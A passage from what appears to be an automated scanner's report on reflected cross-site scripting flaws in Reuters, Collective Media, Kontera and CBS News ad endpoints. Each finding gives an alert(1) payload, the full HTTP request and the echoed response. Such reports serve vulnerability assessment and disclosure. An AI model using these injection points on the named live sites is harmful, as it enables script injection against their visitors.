rtc_0=MLsP9rUKZxpj59KV+d0GobS1ofpFPmyJ6+F6a4PwENs1xPdwNgddSDSVOsHyOd8t4Gul9juL0HAqtiTgQ+wOUj6sHdq18qcN29doGuSlDlfQUx6AAYlMw7oUnof1vIDqnFz5jfVQu36nqn6C5AyR0kECy+QYtjAOsSmgGqpigiaJIyLc2z3MeOuGtBEyZ42uYZU8iXSXjO1q1vl7Cw5uHNUAGA1l1FOXVA2nO7Wv440NH0+cbLe8Aw2jqbVXiS3BZwWWkKUOoO7v4+XDqtAgF8BRPlPTxv8SuqKG1smaLsa7sC2H6pvUQrkbjzCY8tbVNXkfXZ2Cuecebl8itSR/23XNTYWWTG7aDB72gAwyI6TftXRDSq11zxcxwTuKu/quM+xmqtKquNSBlokUqt+GfYzys6TxZfxQIIwcOp3QraOss189QFq4C2GdykVJkjv/OsoSbCYBE1GOcTTLC3bHOuKSpwiKQS7y5Ac0ryu6w6hSSt8miqzf7LA465vLtsDV8Nv0czEXPeyY2xChlOecslsKILK4bbNmlK73d1fw5Bsp4c+k647JuxZ6iiryM6quo5PEM6ToFLzSf0qKTpL12vBFNjNK7kkaKQP9BpBAWFz5uZ5u2kcUK9CSr1SMIBwi5sjqQQBE+XN1Tyix4NegBuJW/bedtok+xskRAFCuTJFagyI+wr1KIvAweiNflWw4K+QURf2o/fxDOJbcKuMD2jCSADrej1Y+DFBr5k4wgKkLsGX7kY/E/cSkEg4OOHwRT6WByRjRR/ufqD9SzaB7LmxrtFp9dbwlvi9gTh1YZuSGYmCTg4XwZ2QJNq+xsc46GWUfM+OMHy5wnbeAnlJHmIY0Z2mErv23JpUX6pbyYxyzkkq4W4djFLnbF2nLHwWAmB9uAyu7amD/B+8+yZOpAUkogl1z9+8Z+6jsuTK/VOi+2y2UiegLvcl61cIDRT/8qRhC2LJ4G+WMe7bW2IVe+9U5FiMAhSxTiPZRFaxS3bdUw0XVvS2zxskmS4zjyIQoGu+8KS/aKqlJ+0KWVxf+cy6N7MGnvi4NH7Mz8fpPShrI9X1GSZ7fxh6GZUlIpfI7Sw2iOtzlxmVcm98YapkjyY7JlNSXts7w9lJi+jD4Y1aLRDYb9qzrT002BvYfISU6s9wOO271mwNHSA4iarDm3+VAQAbTFxP1zd//BFk2y1ZTk/TkDo2ofjJVZREui/tSsMm4ckTRq1G8OS8QueQS1+PcRNTOtBFcCovi0hCKrNzBD4HlKg0pvigPtNZeVKI2MhU0Rh/2AIo8opCZO7ofeje86m/0SEwKtGm1aqj6ovb2kW3lRMSXZ7vt9opHW66DDc6caWR44O+QOF/lz9qoRMhLobDgQ+TkDWKIZWtQsZtW0GM7clhp1r0t52Gk1KGLoBag3ofztC/7bkGMblgi6nb5iwCBFvBp5bPWflhLHZi0zaVuVu4EKJ/Qeqc1rx7vQnOc4b6/wrqHiC+7wQtvlU/MhCbKeAtX7EJ9g5Ek1yGJTFCyzrS/6dhsEjCXWK9T0OuEHHd+9nhqOWSadHIeDkBdHv6YcR/52Djd2oXIzuBTjS0vOBjkjCzRVUKr31r4BPNQi2GE2XHMBeB2/IwbHDGeJsGTSkbN/HOr1X2Ru1q2K5vzAP025R0AHb+cEoiEmmNciguX; rsi_segs_1000000=pUPF4z+huXIMJ/CEaAMFwgwB3JQXgbYffOIWz+9rAA+k8XfpRw9eCQZQqGmcIzTjXSAUBzoDRORma50yQYaTggnMAJWMtfEaCG9RNDhBmhhoFpLVYb1QAaikElI1EzDjWZeplYB7btwtjc30aFwc9SFtsiObQEFHAoe/dYa9RIl6YrHoGVp61CJIknsGjPoisliOJbdyBE/6AhbluZCZcLdmaxkVC/7FIDXZOrPrxbQIcaMlixqdrNOlRsw43z+irf3tiPK5cop1P9m1NhdHHFznLXULZKqBiHgSlB85iqrHPsC1fYazyuIw8vHwUS7AomPmwwXolg1kd5BY0NFb5BQ/QTXBC5w2nIP4uRKPIINoDa4k/29PpifccQtpQpdV+qCJ6fKjUNNmqpI686wDJsOAaUvxt3W+6xU12xtfvaPtnDgSIfyzEDNcScWy9m8Hz9jYvNZDLyTcVhnYhbu11/9v/E9jdiXRXnZJPXbYj7ge0e3QizSDYJYt1ie62jeFk6WA+PNRDJexI/oOxdub7VOBOKK00Bt+ClGige1LLhhtaD4zPpeuhoicx0R9y9LzRPEq3NcTeKIxrG+ICxEQFoP+oWf2t+j6vi0fPocRwd9DEfcnfpwvbmC4QN5KSHmEKqk=; rsi_us_1000000=pUMd4StHMAYY7cmvw1p/36bj1xRpukrv+40/vqtdLOUHLrwk5zZ2qhsPzc+lg3Bt8RLp8iKiUPa3XuCDoBNcfFq/RdgqHN5CKaBoz+O2kREyDWVcMxSyylJEXmDs2DpFzhFlJZMgukW0j5BsAShPRg3ahMzJsvrInsy43Y3Ik1EbcEVGcfcHtm88vnlf/NKKWrTDzxH8ToJcr/KP8aF6wKuIIuSFY1HyfEolYUJ6hIxU/DsQ5pZezzA5PrktqQqi6v3Wv57aF5X89i4Zuo9CxekbLWz3DadfZrzdPZOxOVrNxBEwSeZUC5/8yUpYWynney4v6nl9rZEHZZvsyirMcsDywz7ZKCn4EFchzzXfBpnq8XQz+2sSXsxjJ4Fp5ouY9MNTE7vtIzvBGIs4kVxccu38xRpqVmISo3E1EP7M0WFhjTkPSHf2Y5aEiK+61Wmm4VKwUUqq9aIYXhGOQwTtmVm0v1HfdeZzSCrwbhVvChq4JkwJLhPjd1sp5zjwQnParactZqkrrcCDNfp8DI/WbrJHc0HEg111jln8n8/nBz30lA07KDmM5wrzSD95162vqYltuzijg5OPuyHhY0QsiyDW5jwkD0YwU22K5vXJRridHmZs0bT218krOxLW7gVHDClVbIxIzgcU04neBN4NFrpN2K5OHivrAd1rX1FkWLbs9dnjo7eits8JRk1zm1Zn7HhJu5iJDZNl9dZ4B+edgIAL1oimSfZDscaOmCgCMgxKR2xaDk3km7cEA2e4qT8I2wP8cdib5LHVixXPSd9Y4gjogwVEwJc2Bl5XCy1b66RNlNGEzCRJEZYjYNpmZ030+OIKuC8zbe7ir/Lz6bmqnCZZy+TnJGTDtmbLiaQ8W9FU9TMj596o5RLlEl3SfqBEG7M9o7CrZp2gxC9Vetp9WHixCPr0omjdvfbqCjqr6J2K3NesFI/GIZQH+lgJ++495TC6ZoGhQxLQVJ5ueM5HcKrtrTDDFRTKvb27a+Y4Sgii292yigszCeiwnH7+Uq4dRBgflLO0Z0UE2O3ESjLU/ljWM+Ub2TS3xfJgQIj+aq5z3/AklNbdXdJnU9li4xcPDdZGy7mYLElRhSPr59P2H6afq9KBKPfXXXS1Y2Avd6wgcxqMldeXt6WEA5ZYIH11zu8FxqCCmsQp9t8v2DsH+3KxcwJtDoiOUDdMJa9n8UlMkzdPvOfOonGewmvVaVsBtprgdEMBDIMoMqmiVS5a19OyotaW0voPWaIkmZ/fMm7TvShtl5dHq0B91RCsIgs2CS0HWLEEOZC+V89CvbyW6Keb962RbN1YriQpUjlPG/gVedAxnMstd42yfJ7WmDnHQ6H5I0hnOMr1XElKxyjNFxboa63FpVE4eBC9a2TQCDuloW5275+LblZq5LlXWSIu8OP7XU6PZPHfzCpcp+xUvGsULcWPQqvlBmcHu27bTWvswPzZlatnrlRCTrU+EAcF9YV/ae4FtM2jgAv1+zyXo5ydM0CngasaPNrXfi7RXCEtRvzcrGCDew4RCwP1BLNOgiS7IS62KzdhZK+Z5Gb4h6z/Aq4MTu1GYMGKjuwfCv+qQ/YuImKaLGSfi0ctyRQKAxLXZcyWis1gJ0zbWAH3fdtDHOoX9z0N3PG1puhu51DQl7QxkDEr4Dl1gPStbkem0wITBjfYMyPohW1eXFin2X/+tKqzNtBDyYmaJdqrIQWebd1RR0t4sbou5mlzaou7VR9cvJXpG78ddtsDLATKSnjglI0QKDmZXLMnIp/ePXWcvp3jNAy4Nk50Xq8lh5bOSftsduaYlDHYT9Y5fK+4Hsei6uk/7I5QkDdVtVt462jwGMrg+EeVUT8G4txgkWWDao0Q+k2UtZgFpSXt3jeVp6mmp+FiXaUNm+zdzY2v6bwhqYueugjUyklLOvcE9QDIvnPiHCboy3A91xwjH0aJPI/g2Rb5GY454tH9qvn0vO3qBwYIC7Ay

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 14 Feb 2011 01:34:46 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 15 Feb 2011 01:34:46 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:34:45 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "J0553161C78<SCRIPT>ALERT(1)</SCRIPT>60081D2E459" was not recognized.
*/

1.189. http://js.uk.reuters.com/recommend/re/re [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.uk.reuters.com
Path:   /recommend/re/re

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload e1f59%3balert(1)//ba2841abbb3 was submitted in the callback parameter. This input was echoed as e1f59;alert(1)//ba2841abbb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /recommend/re/re?callback=Reuters.tns.updateRecommendationse1f59%3balert(1)//ba2841abbb3&ed=uk&u=173.193.214.243-2605364368.30126492 HTTP/1.1
Host: js.uk.reuters.com
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=28259640.1297647396.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=28259640.2003575633.1297647396.1297647396.1297647396.1; __utmc=28259640; __utmb=28259640.1.10.1297647396; rsi_segs=D08734_70009|D08734_70011|D08734_70049|D08734_70057|D08734_70075|D08734_70086|D08734_70093|D08734_70509|D08734_71432

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:39:11 GMT
Server: Apache-Coyote/1.1
Expires: Mon, 14 Feb 2011 01:49:12 GMT
max-age: 600000
Content-Type: text/javascript;charset=UTF-8
Connection: close
Content-Length: 157

if (typeof Reuters.tns.updateRecommendationse1f59;alert(1)//ba2841abbb3 === 'function') {Reuters.tns.updateRecommendationse1f59;alert(1)//ba2841abbb3([]);}

1.190. http://k.collective-media.net/cmadj/cm.dailymail/ron_052010 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.dailymail/ron_052010

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffd2a'-alert(1)-'1bc15b5788c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadj/cm.dailymailffd2a'-alert(1)-'1bc15b5788c/ron_052010;sz=300x250;net=cm;ord=3412338;ord1=572356;cmpgurl=http%253A//www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 01:35:29 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Tue, 15-Feb-2011 01:35:29 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Tue, 15-Feb-2011 01:35:29 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Mon, 14-Feb-2011 09:35:29 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Tue, 15-Feb-2011 01:35:29 GMT
Content-Length: 9197

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-77028052_1297647329","http://ib.adnxs.com/ptj?member=311&inv_code=cm.dailymailffd2a'-alert(1)-'1bc15b5788c&size=300x250&referrer=http%3A%2F%2Fwww.dailymail.co.uk%2Fnews%2Farticle-1356403%2FNHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html&redir=http%3A%2F%2Fad.doubleclic
...[SNIP]...

1.191. http://k.collective-media.net/cmadj/cm.drudgerep/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.drudgerep/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6385'-alert(1)-'77065afc5a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmadj/cm.drudgerepf6385'-alert(1)-'77065afc5a2/;sz=300x250;net=cm;ord=$cacheBuster$;ord1=789918;cmpgurl=http%253A//www.drudgereport.com/? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 14 Feb 2011 02:10:21 GMT
Connection: close
Content-Length: 8383

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-64453616_1297649421","http://ib.adnxs.com/ptj?member=311&inv_code=cm.drudgerepf6385'-alert(1)-'77065afc5a2&size=300x250&referrer=http%3A%2F%2Fwww.drudgereport.com%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.drudgerepf6385%27-alert%281%29-%2777065afc5a2%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-64453616_1297649421%
...[SNIP]...

1.192. http://kona5.kontera.com/KonaGet.js [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona5.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c2dd"%3balert(1)//6cad627a8b3 was submitted in the l parameter. This input was echoed as 2c2dd";alert(1)//6cad627a8b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KonaGet.js?u=1297647428875&p=113247&k=http%3A//www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.htmljpNNP3&al=1&l=http%3A//www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html2c2dd"%3balert(1)//6cad627a8b3&t=Is+the+army+tightening+its+grip+on+Egypt+%3F+-+Africa+%2C+World+-+The+Independent&m2=The+Independent+now+has+a+Google+Chrome+Extension+.+Get+the+latest+news+on+the+topics+you+like+%2C+direc&rId=0&rl=0&1=14&mod=65555&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1
Host: kona5.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=F3BC9B36-258A-11E0-835C-00163E201265

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Connection: close
Content-Length: 1953

konaSafe(function(){
teUrl='http://te.kontera.com/ContentLink/ContentLink?publisherId=113247&layout=adlinks&sId=1401&cb=1297647520&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPage(6);
reJs
...[SNIP]...
RequestId="37787202445334700";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html2c2dd";alert(1)//6cad627a8b3&dc_aff_id=");
onKonaReturn(1);
}, "reaction response");

1.193. http://kona5.kontera.com/KonaGet.js [rId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona5.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74fff"-alert(1)-"bf142052b was submitted in the rId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /KonaGet.js?u=1297647428875&p=113247&k=http%3A//www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.htmljpNNP3&al=1&l=http%3A//www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html&t=Is+the+army+tightening+its+grip+on+Egypt+%3F+-+Africa+%2C+World+-+The+Independent&m2=The+Independent+now+has+a+Google+Chrome+Extension+.+Get+the+latest+news+on+the+topics+you+like+%2C+direc&rId=074fff"-alert(1)-"bf142052b&rl=0&1=14&mod=65555&rm=1&dc_aff_id=0&add=FlashVer_Shockwave%20Flash%2010.2%20r154|user_|session_ HTTP/1.1
Host: kona5.kontera.com
Proxy-Connection: keep-alive
Referer: http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KONA_USER_GUID=F3BC9B36-258A-11E0-835C-00163E201265

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Connection: close
Content-Length: 2004

konaSafe(function(){
teUrl='http://te.kontera.com/ContentLink/ContentLink?publisherId=113247&layout=adlinks&sId=1401&cb=1297647521&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPage(6);
reJs
...[SNIP]...
,157813,'army',512,1,"","39905;57830;7753");
addContentLink(560,1335360,'elections',537,1,"","39905;57830;7753");
}, "reaction response");
konaSafe(function(){
konaTweakMode=134299923;
konaRequestId="074fff"-alert(1)-"bf142052b";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html&dc_aff_id=");
onKonaReturn(
...[SNIP]...

1.194. http://mads.cbsnews.com/mac-ad [&adfile parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the &adfile request parameter is copied into the HTML document as plain text between tags. The payload 63eb8<a>ae9d22d54df was submitted in the &adfile parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?SP=16&_RGROUP=15001&NCAT=250%3a503544%3a&CNET-BRAND-ID=55&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=162&ASSET_HOST=adimg.cbsnews.com&PTYPE=8301&CNET-ONTOLOGY-NODE-ID=503544&&CID=20031629&&POS=200&ENG:DATETIME=2011.02.13.20.35.25&SYS:RQID=00phx1-ad-e21:4D586AC51D0143&&REFER_HOST=www.cbsnews.com&&&&&DVAR_INSTLANG=en%2dUS&DVAR_LB_MPU=1&&adfile=7074/11/445159_wc.ca63eb8<a>ae9d22d54df HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:45:31 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:45:31 GMT
Content-Length: 717

<!-- MAC ad --><!-- NO AD TEXT: _QUERY_STRING="SP=16&_RGROUP=15001&NCAT=250%3a503544%3a&CNET-BRAND-ID=55&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=162&ASSET_HOST=adimg.cbsnews.com&PTYPE=8301&CNET-ONTOLO
...[SNIP]...
-ID=503544&&CID=20031629&&POS=200&ENG:DATETIME=2011.02.13.20.35.25&SYS:RQID=00phx1-ad-e21:4D586AC51D0143&&REFER_HOST=www.cbsnews.com&&&&&DVAR_INSTLANG=en%2dUS&DVAR_LB_MPU=1&&adfile=7074/11/445159_wc.ca63eb8<a>ae9d22d54df" _REQ_NUM="0" -->
...[SNIP]...

1.195. http://mads.cbsnews.com/mac-ad [ADREQ&SP parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the ADREQ&SP request parameter is copied into the HTML document as plain text between tags. The payload 6c6da<a>a48d6ff9148 was submitted in the ADREQ&SP parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=806c6da<a>a48d6ff9148&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:38:11 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:38:11 GMT
Content-Length: 591

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=806c6da<a>a48d6ff9148&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBSNEWS' BRAND='55' SITE='162' SP='80664869148' CNET-PTYPE='00' POS='100' NCAT='250:503544:' CNET-PARTNER-ID='1' DVAR_
...[SNIP]...

1.196. http://mads.cbsnews.com/mac-ad [ADREQ&beacon parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the ADREQ&beacon request parameter is copied into a JavaScript inline comment. The payload 68943*/alert(1)//59a571ec2f7 was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=168943*/alert(1)//59a571ec2f7&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:38:07 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Mon, 14 Feb 2011 01:38:07 GMT
Content-Length: 572

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C%7C%3Bcbsnews.com%3B%3B%7C-1&SITE=162&BRAND=55&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=91501745&ADREQ&beacon=168943*/alert(1)//59a571ec2f7&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='16894315957127' SPECIFIED. BEACON CALL FAILED. */;window.CBSI_PAGESTATE='1||;cbsnews.com;;|-1';/* MAC [r20101202-0915-v1-13-13-JsonEnco
...[SNIP]...

1.197. http://mads.cbsnews.com/mac-ad [BRAND parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbsnews.com
Path:   /mac-ad

Issue detail

The value of the BRAND request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1aa3'%3balert(1)//8fee192004 was submitted in the BRAND parameter. This input was echoed as b1aa3';alert(1)//8fee192004 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55b1aa3'%3balert(1)//8fee192004&CID=20031629&NCAT=250%3A503544%3A&NODE=503544&PTYPE=8301&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=86874354&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
